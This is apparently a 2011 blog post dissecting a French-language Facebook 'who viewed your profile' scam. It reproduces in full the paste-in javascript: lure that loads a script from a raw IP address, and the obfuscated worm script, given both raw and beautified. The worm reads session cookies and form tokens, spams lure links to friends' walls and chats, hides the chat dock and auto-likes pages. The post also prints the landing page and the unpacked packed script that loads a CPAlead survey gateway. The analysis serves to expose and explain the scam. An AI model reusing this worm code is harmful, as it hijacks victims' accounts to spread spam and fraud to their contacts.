Monday, 16 May 2011

Scam: qui regarde mon profil Facebook (cpalead survey)



javascript:(function(){_ccscr=document.createElement('SCRIPT');_ccscr.type='text/javascript';_ccscr.src='http://184.107.77.69/rad.php?'+(Math.random());document.getElementsByTagName('head')[0].appendChild(_ccscr);})();


http://184.107.77.69/rad.php:
function readCookie(_0x491dx2) { var _0x491dx3 = _0x491dx2 + '='; var _0x491dx4 = document['cookie']['split'](';'); for (var _0x491dx5 = 0; _0x491dx5 < _0x491dx4['length']; _0x491dx5++) { var _0x491dx6 = _0x491dx4[_0x491dx5]; while (_0x491dx6['charAt'](0) == ' ') { _0x491dx6 = _0x491dx6['substring'](1, _0x491dx6['length']); }; if (_0x491dx6['indexOf'](_0x491dx3) == 0) { return _0x491dx6['substring'](_0x491dx3['length'], _0x491dx6['length']); }; }; return null; }; var user_id = readCookie('c_user'); var user_name = document['getElementById']('navAccountName')['innerHTML']; var post_form_id = document['getElementsByName']('post_form_id')[0]['value']; var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value']; var this_chat = 'Bonjour! Je viens de decouvrir qui ont consulte mon profil aujourd hui! Vous pouvez trouver @ http://linka.cc/5W6x'; var prepared_chat = encodeURIComponent(this_chat); var token = Math['round'](new Date()['getTime']() / 1000); var http1 = new XMLHttpRequest(); var url1 = 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token=' + token + '-6&filter[0]=user&options[0]=friends_only'; var params1 = ''; http1['open']('GET', url1 + '?' 
+ params1, true); http1['onreadystatechange'] = function () { if (http1['readyState'] == 4 && http1['status'] == 200) { var _0x491dx13 = http1['responseText']; _0x491dx13 = _0x491dx13['replace']('for (;;);', ''); _0x491dx13 = JSON['parse'](_0x491dx13); var _0x491dx14 = 0; for (uid in _0x491dx13['payload']['entries']) { if (_0x491dx14 < 400) { var _0x491dx15 = new XMLHttpRequest(); var _0x491dx16 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1'; var _0x491dx17 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + _0x491dx13['payload']['entries'][_0x491dx14]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]=http://www.facebook.com&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]=http://i.imgur.com/xmJXf.jpg&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]=Maintenant vous pouvez voir qui regarde votre profil tous les 
jours!&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]=http://bit.ly/maIQdk&attachment[params][favicon]=http://lol.info/os/favicon.ico&attachment[params][title]=Voir qui a vu votre profil!&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][url]=http://www.facebook.com&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][images][0]=http://i.imgur.com/xmJXf.jpg&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&xhpc_message=Wow, cela fonctionne vraiment! 
Decouvrez qui consulte votre profil!&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest'; _0x491dx15['open']('POST', _0x491dx16, true); _0x491dx15['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x491dx15['setRequestHeader']('Content-length', _0x491dx17['length']); _0x491dx15['setRequestHeader']('Connection', 'keep-alive'); _0x491dx15['onreadystatechange'] = function () { if (_0x491dx15['readyState'] == 4 && _0x491dx15['status'] == 200) {}; }; _0x491dx15['send'](_0x491dx17); }; _0x491dx14++; }; http1['close']; }; }; http1['send'](null); var hide = document['getElementById']('fbDockChatTabSlider'); hide['style']['display'] = 'none'; var http3 = new XMLHttpRequest(); var url3 = 'http://www.facebook.com/ajax/chat/buddy_list.php?__a=1'; var params3 = 'user=' + user_id + '&popped_out=false&force_render=true&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http3['open']('POST', url3, true); http3['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http3['setRequestHeader']('Content-length', params3['length']); http3['setRequestHeader']('Connection', 'close'); http3['onreadystatechange'] = function () { if (http3['readyState'] == 4 && http3['status'] == 200) { var _0x491dx1c = http3['responseText']; _0x491dx1c = _0x491dx1c['replace']('for (;;);', ''); _0x491dx1c = JSON['parse'](_0x491dx1c); var _0x491dx14 = 0; for (property in _0x491dx1c['payload']['buddy_list']['nowAvailableList']) { if (_0x491dx14 < 100) { var _0x491dx1d = new XMLHttpRequest(); var _0x491dx1e = Math['floor'](Math['random']() * 1000000); var _0x491dx1f = Math['round'](new Date()['getTime']() / 1000); var _0x491dx20 = 'http://www.facebook.com/ajax/chat/send.php?__a=1'; var _0x491dx21 = 'msg_id=' + _0x491dx1e + '&client_time=' + _0x491dx1f + '&to=' + property + '&num_tabs=1&pvs_time=' + _0x491dx1f + '&msg_text=' + prepared_chat + '&to_offline=false&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg 
+ '&lsd&post_form_id_source=AsyncRequest'; _0x491dx1d['open']('POST', _0x491dx20, true); _0x491dx1d['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); _0x491dx1d['setRequestHeader']('Content-length', _0x491dx21['length']); _0x491dx1d['setRequestHeader']('Connection', 'close'); _0x491dx1d['onreadystatechange'] = function () { if (_0x491dx1d['readyState'] == 4 && _0x491dx1d['status'] == 200) {}; }; _0x491dx1d['send'](_0x491dx21); }; _0x491dx14++; }; http3['close']; }; }; http3['send'](params3); var http4 = new XMLHttpRequest(); var url4 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params4 = 'fbpage_id=217548714935541&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http4['open']('POST', url4, true); http4['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http4['setRequestHeader']('Content-length', params4['length']); http4['setRequestHeader']('Connection', 'close'); http4['onreadystatechange'] = function () { if (http4['readyState'] == 4 && http4['status'] == 200) { http4['close']; }; }; http4['send'](params4); var http5 = new XMLHttpRequest(); var url5 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params5 = 'fbpage_id=198701800175160&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http5['open']('POST', url5, true); http5['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http5['setRequestHeader']('Content-length', params5['length']); http5['setRequestHeader']('Connection', 'close'); http5['onreadystatechange'] = function () { if (http5['readyState'] == 4 && http5['status'] == 200) { http5['close']; }; }; http5['send'](params5); var http6 = new XMLHttpRequest(); var url6 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1'; var params6 = 
'fbpage_id=226360327377843&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest'; http6['open']('POST', url6, true); http6['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded'); http6['setRequestHeader']('Content-length', params6['length']); http6['setRequestHeader']('Connection', 'close'); http6['onreadystatechange'] = function () { if (http6['readyState'] == 4 && http6['status'] == 200) { http6['close']; }; }; http6['send'](params6); function include(_0x491dx2c) { var _0x491dx2d = document['createElement']('script'); _0x491dx2d['src'] = _0x491dx2c; _0x491dx2d['type'] = 'text/javascript'; _0x491dx2d['defer'] = true; document['getElementsByTagName']('head')['item'](0)['appendChild'](_0x491dx2d); }; include('http://code.jquery.com/jquery-1.5.2.min.js'); /////////////////// //////////////////////////////////////////////////////////////////////////////////////////// ////////////////// var randomnumber=Math.floor(Math.random()*999999) var chatmessage = ""; var postmessage = "%tf% %tf% %tf% %tf% Vous les gars regarde mon profil le plus aujourd hui! Voir qui ont regarde le votre @ http://linka.cc/5W6x"; var redirect = "http://184.107.77.69/end.php"; var eventdesc = "Bonjour\n\nSi vous voulez savoir qui a vu votre profil, cliquez ci-dessous::\n\n http://linka.cc/5W6x#"+randomnumber; var eventname = "Voir qui a vu votre profil!"+randomnumber; var nfriends = 5000; //

Beautified:
// Returns the value of the cookie whose name is passed in, or null when
// document.cookie holds no entry starting with "<name>=".
// Identifiers of the form _0x491dx.. are left exactly as the obfuscator emitted
// them so this listing can be matched against the raw rad.php capture.
function readCookie(_0x491dx2) {
    // Prefix to look for: the cookie name followed by '='.
    var _0x491dx3 = _0x491dx2 + '=';
    // document.cookie is a single "a=1; b=2" string; split it into entries.
    var _0x491dx4 = document['cookie']['split'](';');
    for (var _0x491dx5 = 0; _0x491dx5 < _0x491dx4['length']; _0x491dx5++) {
        var _0x491dx6 = _0x491dx4[_0x491dx5];
        // Strip the leading spaces left behind by the '; ' separators.
        while (_0x491dx6['charAt'](0) == ' ') {
            _0x491dx6 = _0x491dx6['substring'](1, _0x491dx6['length']);
        };
        // Entry starts with "<name>=": return what follows the prefix.
        if (_0x491dx6['indexOf'](_0x491dx3) == 0) {
            return _0x491dx6['substring'](_0x491dx3['length'], _0x491dx6['length']);
        };
    };
    return null;
};
// Setup: collect everything the later requests need from the page the script
// was injected into. All of it is read from the victim's own logged-in tab.
// Account id, taken from the 'c_user' cookie.
var user_id = readCookie('c_user');
// Display name from #navAccountName; assigned here but not read again in this listing.
var user_name = document['getElementById']('navAccountName')['innerHTML'];
// NOTE(review): post_form_id and fb_dtsg look like the per-session form tokens
// embedded in the page. They are copied into every POST below, so the requests
// carry the same tokens a genuine user action would; confirm against the page markup.
var post_form_id = document['getElementsByName']('post_form_id')[0]['value'];
var fb_dtsg = document['getElementsByName']('fb_dtsg')[0]['value'];
// Chat lure text; the short link in it is a static indicator for this campaign.
var this_chat = 'Bonjour! Je viens de decouvrir qui ont consulte mon profil aujourd hui! Vous pouvez trouver @ http://linka.cc/5W6x';
var prepared_chat = encodeURIComponent(this_chat);
// Current time in whole seconds, used as the 'token' query parameter.
var token = Math['round'](new Date()['getTime']() / 1000);
var http1 = new XMLHttpRequest();
// Typeahead endpoint queried with filter[0]=user and options[0]=friends_only for this viewer.
var url1 = 'http://www.facebook.com/ajax/typeahead/first_degree.php?__a=1&viewer=' + user_id + '&token=' + token + '-6&filter[0]=user&options[0]=friends_only';
var params1 = '';
// params1 is empty, so this only appends a stray '?' to a URL that already has a query string.
http1['open']('GET', url1 + '?' + params1, true);
// Wall-post stage: once the friends_only typeahead request completes, send one
// composer.php POST per returned entry (at most 400).
http1['onreadystatechange'] = function () {
    if (http1['readyState'] == 4 && http1['status'] == 200) {
        var _0x491dx13 = http1['responseText'];
        // Remove the literal 'for (;;);' prefix so the remainder parses as JSON.
        _0x491dx13 = _0x491dx13['replace']('for (;;);', '');
        _0x491dx13 = JSON['parse'](_0x491dx13);
        // Counter that both caps the loop and indexes payload.entries.
        var _0x491dx14 = 0;
        // `uid` is an undeclared loop key (implicit global) and is never read;
        // the entry is picked by the counter instead.
        for (uid in _0x491dx13['payload']['entries']) {
            if (_0x491dx14 < 400) {
                var _0x491dx15 = new XMLHttpRequest();
                var _0x491dx16 = 'http://www.facebook.com/ajax/profile/composer.php?__a=1';
                // POST body: the page tokens, the entry's uid as xhpc_targetid, and a
                // hand-built link attachment. The attachment declares
                // url=http://www.facebook.com while urlInfo[user] carries a bit.ly link.
                // The fixed title, image URL and short link are usable as indicators.
                // The line break inside the string is present in the listing as captured
                // and looks like a wrapping artifact.
                var _0x491dx17 = 'post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&xhpc_composerid=u574553_1&xhpc_targetid=' + _0x491dx13['payload']['entries'][_0x491dx14]['uid'] + '&xhpc_context=profile&xhpc_fbx=1&aktion=post&app_id=2309869772&UIThumbPager_Input=0&attachment[params][metaTagMap][0][http-equiv]=content-type&attachment[params][metaTagMap][0][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][metaTagMap][1][property]=og%3Atitle&attachment[params][metaTagMap][1][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][2][property]=og%3Aurl&attachment[params][metaTagMap][2][content]=http://www.facebook.com&attachment[params][metaTagMap][3][property]=og%3Asite_name&attachment[params][metaTagMap][3][content]=Voir qui a vu votre profil!&attachment[params][metaTagMap][4][property]=og%3Aimage&attachment[params][metaTagMap][4][content]=http://i.imgur.com/xmJXf.jpg&attachment[params][metaTagMap][5][property]=og%3Adescription&attachment[params][metaTagMap][5][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][6][name]=description&attachment[params][metaTagMap][6][content]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][metaTagMap][7][http-equiv]=Content-Type&attachment[params][metaTagMap][7][content]=text%2Fhtml%3B%20charset%3Dutf-8&attachment[params][medium]=106&attachment[params][urlInfo][user]=http://bit.ly/maIQdk&attachment[params][favicon]=http://lol.info/os/favicon.ico&attachment[params][title]=Voir qui a vu votre profil!&attachment[params][fragment_title]=&attachment[params][external_author]=&attachment[params][summary]=Maintenant vous pouvez voir qui regarde votre profil tous les jours!&attachment[params][url]=http://www.facebook.com&attachment[params][ttl]=0&attachment[params][error]=1&attachment[params][responseCode]=206&attachment[params][metaTags][description]=Maintenant vous pouvez voir qui regarde votre profil tous les 
jours!&attachment[params][images][0]=http://i.imgur.com/xmJXf.jpg&attachment[params][scrape_time]=1302991496&attachment[params][cache_hit]=1&attachment[type]=100&xhpc_message_text=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&xhpc_message=Wow, cela fonctionne vraiment! Decouvrez qui consulte votre profil!&nctr[_mod]=pagelet_wall&lsd&post_form_id_source=AsyncRequest';
                _0x491dx15['open']('POST', _0x491dx16, true);
                _0x491dx15['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
                // Content-length and Connection are header names the XHR spec does not
                // let scripts set, so these two calls are not expected to take effect.
                _0x491dx15['setRequestHeader']('Content-length', _0x491dx17['length']);
                _0x491dx15['setRequestHeader']('Connection', 'keep-alive');
                // Empty handler: the response to each post is never inspected.
                _0x491dx15['onreadystatechange'] = function () {
                    if (_0x491dx15['readyState'] == 4 && _0x491dx15['status'] == 200) {};
                };
                _0x491dx15['send'](_0x491dx17);
            };
            _0x491dx14++;
        };
        // Bare property access with no call: this statement does nothing.
        http1['close'];
    };
};
// Fire the friend-list request that drives the handler above.
http1['send'](null);
// Chat stage. The element #fbDockChatTabSlider is hidden first.
// NOTE(review): presumably this keeps the chat tabs for the messages sent below
// out of the victim's sight; the listing itself does not say why.
var hide = document['getElementById']('fbDockChatTabSlider');

hide['style']['display'] = 'none';

var http3 = new XMLHttpRequest();

var url3 = 'http://www.facebook.com/ajax/chat/buddy_list.php?__a=1';

// Buddy-list request body, carrying the account id and the page tokens read earlier.
var params3 = 'user=' + user_id + '&popped_out=false&force_render=true&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http3['open']('POST', url3, true);
http3['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
// Content-length and Connection are header names the XHR spec does not let
// scripts set, so these two calls are not expected to take effect.
http3['setRequestHeader']('Content-length', params3['length']);
http3['setRequestHeader']('Connection', 'close');
// When the buddy list arrives, send the chat lure to each key of
// nowAvailableList (at most 100).
http3['onreadystatechange'] = function () {
    if (http3['readyState'] == 4 && http3['status'] == 200) {
        var _0x491dx1c = http3['responseText'];
        // Remove the literal 'for (;;);' prefix so the remainder parses as JSON.
        _0x491dx1c = _0x491dx1c['replace']('for (;;);', '');
        _0x491dx1c = JSON['parse'](_0x491dx1c);
        var _0x491dx14 = 0;
        // `property` is an undeclared loop key (implicit global); here it is the
        // recipient id placed in the 'to' field.
        for (property in _0x491dx1c['payload']['buddy_list']['nowAvailableList']) {
            if (_0x491dx14 < 100) {
                var _0x491dx1d = new XMLHttpRequest();
                // Random message id below 1,000,000 and the current time in seconds.
                var _0x491dx1e = Math['floor'](Math['random']() * 1000000);
                var _0x491dx1f = Math['round'](new Date()['getTime']() / 1000);
                var _0x491dx20 = 'http://www.facebook.com/ajax/chat/send.php?__a=1';
                // msg_text is the URL-encoded lure (prepared_chat) defined outside this block.
                var _0x491dx21 = 'msg_id=' + _0x491dx1e + '&client_time=' + _0x491dx1f + '&to=' + property + '&num_tabs=1&pvs_time=' + _0x491dx1f + '&msg_text=' + prepared_chat + '&to_offline=false&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
                _0x491dx1d['open']('POST', _0x491dx20, true);
                _0x491dx1d['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
                _0x491dx1d['setRequestHeader']('Content-length', _0x491dx21['length']);
                _0x491dx1d['setRequestHeader']('Connection', 'close');
                // Empty handler: the response to each message is never inspected.
                _0x491dx1d['onreadystatechange'] = function () {
                    if (_0x491dx1d['readyState'] == 4 && _0x491dx1d['status'] == 200) {};
                };
                _0x491dx1d['send'](_0x491dx21);
            };
            _0x491dx14++;
        };
        // Bare property access with no call: this statement does nothing.
        http3['close'];
    };
};
http3['send'](params3);

// Page stage: three identical POSTs to fan_status.php with add=1, differing
// only in the hard-coded fbpage_id. Each carries the page tokens read earlier.
// NOTE(review): add=1 on fan_status.php presumably makes the account a fan of
// (likes) the page; the three ids are usable as indicators for this campaign.
// In all three requests the Content-length and Connection headers are names the
// XHR spec does not let scripts set, and `httpN['close'];` is a bare property
// access that does nothing.
var http4 = new XMLHttpRequest();

var url4 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';

// First page id.
var params4 = 'fbpage_id=217548714935541&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http4['open']('POST', url4, true);
http4['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http4['setRequestHeader']('Content-length', params4['length']);
http4['setRequestHeader']('Connection', 'close');
http4['onreadystatechange'] = function () {
    if (http4['readyState'] == 4 && http4['status'] == 200) {
        http4['close'];
    };
};
http4['send'](params4);
var http5 = new XMLHttpRequest();
var url5 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';
// Second page id.
var params5 = 'fbpage_id=198701800175160&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http5['open']('POST', url5, true);
http5['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http5['setRequestHeader']('Content-length', params5['length']);
http5['setRequestHeader']('Connection', 'close');
http5['onreadystatechange'] = function () {
    if (http5['readyState'] == 4 && http5['status'] == 200) {
        http5['close'];
    };
};
http5['send'](params5);
var http6 = new XMLHttpRequest();
var url6 = 'http://www.facebook.com/ajax/pages/fan_status.php?__a=1';
// Third page id.
var params6 = 'fbpage_id=226360327377843&add=1&reload=0&preserve_tab=false&nctr[_mod]=pagelet_header&post_form_id=' + post_form_id + '&fb_dtsg=' + fb_dtsg + '&lsd&post_form_id_source=AsyncRequest';
http6['open']('POST', url6, true);
http6['setRequestHeader']('Content-type', 'application/x-www-form-urlencoded');
http6['setRequestHeader']('Content-length', params6['length']);
http6['setRequestHeader']('Connection', 'close');
http6['onreadystatechange'] = function () {
    if (http6['readyState'] == 4 && http6['status'] == 200) {
        http6['close'];
    };
};
http6['send'](params6);
// Appends a deferred <script> element with the given src to the document's
// first <head>, i.e. loads and runs a further script in the current page.
function include(_0x491dx2c) {
    var _0x491dx2d = document['createElement']('script');
    _0x491dx2d['src'] = _0x491dx2c;
    _0x491dx2d['type'] = 'text/javascript';
    _0x491dx2d['defer'] = true;
    document['getElementsByTagName']('head')['item'](0)['appendChild'](_0x491dx2d);
};
// Loads jQuery 1.5.2 into the page. Everything after the first `//` on this
// line is a comment as captured, so the declarations there (postmessage,
// redirect, eventdesc, eventname, nfriends) are not executed in this form.
// NOTE(review): they look like the start of a further section whose line breaks
// were lost in the capture; `redirect` names the end.php page examined further down.
include('http://code.jquery.com/jquery-1.5.2.min.js'); /////////////////// //////////////////////////////////////////////////////////////////////////////////////////// ////////////////// var randomnumber=Math.floor(Math.random()*999999) var chatmessage = ""; var postmessage = "%tf% %tf% %tf% %tf% Vous les gars regarde mon profil le plus aujourd hui! Voir qui ont regarde le votre @ http://linka.cc/5W6x"; var redirect = "http://184.107.77.69/end.php"; var eventdesc = "Bonjour\n\nSi vous voulez savoir qui a vu votre profil, cliquez ci-dessous::\n\n http://linka.cc/5W6x#"+randomnumber; var eventname = "Voir qui a vu votre profil!"+randomnumber; var nfriends = 5000; //


http://184.107.77.69/end.php:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type='text/javascript' src='http://zarkaa.info/dmgca.js'></script>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Profil!</title>
<style type="text/css">
<!--
a:link {
    text-decoration: none;
}
a:visited {
    text-decoration: none;
}
a:hover {
    text-decoration: none;
}
a:active {
    text-decoration: none;
}
a {
    font-size: 16px;
}
-->
</style></head>
<body>
<center>
  <h1><img src="http://i.imgur.com/b9cKL.gif" width="679" height="675" alt="perfil" /></h1>
  <h3><a href="https://addons.mozilla.org/en-US/firefox/addon/ifamebook/">Cliquez ici pour decouvrir!</a></h3>
</center>
        </div>
</body>
</html>
<script type="text/javascript" src="http://widgets.amung.us/small.js"></script><script type="text/javascript">WAU_small('2rnz1x7yms5j')</script>

dmgca.js:
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('3 h=["\\6\\2\\1\\b\\7\\1\\5\\4\\6\\j\\d"];3 f=["\\d\\8\\i\\1\\9\\7\\o\\1\\8\\4\\2\\k\\2"];3 g=["\\2\\l\\a"];3 e=["\\i\\1\\9\\7\\m\\5"];3 n=["\\1\\5\\a\\b\\j\\6\\w\\4\\2\\k\\2"];p.D(z("%y B=\\"C/A\\" x=\\"r://"+h[0]+"/"+f[0]+"?"+g[0]+"=q&s;"+e[0]+"=t\\"%c%v/u%c"));',40,40,'|x61|x70|var|x2E|x64|x63|x65|x79|x74|x62|x6C|3E|x6D|g10f55a1d6ae4b9862567f676a60191c2|m91e69687f76451bab9d5043a8e68a4d8|p19a0f2de42c1d03ca3e0d4641a03cdef|cddebdfc156d3987f6f004d4060ebeefc|x67|x6F|x68|x75|x69|a62c7b3a5f63d0c30d62d705400c1c90b|x77|document|133835|http|amp|MTg3NDY0|script|3C|x6B|src|3Cscript|unescape|javascript|type|text|write'.split('|'),0,{}))

unpack:
// Output of the packer in dmgca.js. Each one-element array holds a hex-escaped
// string fragment; the decoded value is given next to it.
// Decodes to "cpalead.com" (host).
var cddebdfc156d3987f6f004d4060ebeefc = ["\x63\x70\x61\x6C\x65\x61\x64\x2E\x63\x6F\x6D"];
// Decodes to "mygateway.php" (path).
var m91e69687f76451bab9d5043a8e68a4d8 = ["\x6D\x79\x67\x61\x74\x65\x77\x61\x79\x2E\x70\x68\x70"];
// Decodes to "pub" (first query parameter name).
var p19a0f2de42c1d03ca3e0d4641a03cdef = ["\x70\x75\x62"];
// Decodes to "gateid" (second query parameter name).
var g10f55a1d6ae4b9862567f676a60191c2 = ["\x67\x61\x74\x65\x69\x64"];
// Decodes to "adblock.php"; declared but not used in the document.write below.
var a62c7b3a5f63d0c30d62d705400c1c90b = ["\x61\x64\x62\x6C\x6F\x63\x6B\x2E\x70\x68\x70"];
// Writes a <script> tag into the page whose src is assembled from the fragments:
// http://cpalead.com/mygateway.php?pub=133835&amp;gateid=MTg3NDY0
// The pub and gateid values identify this particular gateway and are usable as indicators.
document.write(unescape("<script type=\"text/javascript\" src=\"http://" + cddebdfc156d3987f6f004d4060ebeefc[0] + "/" + m91e69687f76451bab9d5043a8e68a4d8[0] + "?" + p19a0f2de42c1d03ca3e0d4641a03cdef[0] + "=133835&amp;" + g10f55a1d6ae4b9862567f676a60191c2[0] + "=MTg3NDY0\"></script>"));

\x63\x70\x61\x6C\x65\x61\x64\x2E\x63\x6F\x6D = cpalead.com
\x6D\x79\x67\x61\x74\x65\x77\x61\x79\x2E\x70\x68\x70 = mygateway.php
\x70\x75\x62 = pub
\x67\x61\x74\x65\x69\x64 = gateid
\x61\x64\x62\x6C\x6F\x63\x6B\x2E\x70\x68\x70 = adblock.php

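Roughly speaking, it's a social-engineering-based worm that writes a random message on your friends' walls, something like "Click here to see who views your Facebook profile", and when you go to the page it asks you to fill in a CPAlead survey before showing a fake list of viewers. The script does not exploit a browser bug: it runs inside the victim's own logged-in Facebook page, which is why it can read the post_form_id and fb_dtsg values from that page and send the wall posts, chat messages and page requests as the victim.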


It's not a new phenomenon.


--------

http://www.facebook.com/help/?faq=12903

---
Related: SpamLoco - Averigua quién visita tu perfil en Facebook, es falso!

1 comment:

  1. The best you can do is go to the Application page, click on report, attach a screenshot, and hope facebook bans the developers ^^
